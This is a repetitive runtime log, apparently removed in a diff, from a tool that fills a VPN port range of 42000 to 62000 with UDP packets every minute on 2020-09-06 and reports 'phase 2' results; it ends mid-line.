-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:30:05 -Starting port fill at 2020-09-06 08:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:31:07 -Starting port fill at 2020-09-06 08:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:32:06 -Starting port fill at 2020-09-06 08:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:33:05 -Starting port fill at 2020-09-06 08:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:34:05 -Starting port fill at 2020-09-06 08:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:35:07 -Starting port fill at 2020-09-06 08:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:36:04 -Starting port fill at 2020-09-06 08:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:37:05 -Starting port fill at 2020-09-06 08:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:38:04 -Starting port fill at 2020-09-06 08:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:39:04 -Starting port fill at 2020-09-06 08:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:40:04 -Starting port fill at 2020-09-06 08:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:41:06 -Starting port fill at 2020-09-06 08:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:42:04 -Starting port fill at 2020-09-06 08:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:43:05 -Starting port fill at 2020-09-06 08:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:44:04 -Starting port fill at 2020-09-06 08:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:45:04 -Starting port fill at 2020-09-06 08:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:46:07 -Starting port fill at 2020-09-06 08:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:47:04 -Starting port fill at 2020-09-06 08:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:48:04 -Starting port fill at 2020-09-06 08:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:49:05 -Starting port fill at 2020-09-06 08:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:50:05 -Starting port fill at 2020-09-06 08:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:51:05 -Starting port fill at 2020-09-06 08:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:52:05 -Starting port fill at 2020-09-06 08:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:53:05 -Starting port fill at 2020-09-06 08:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 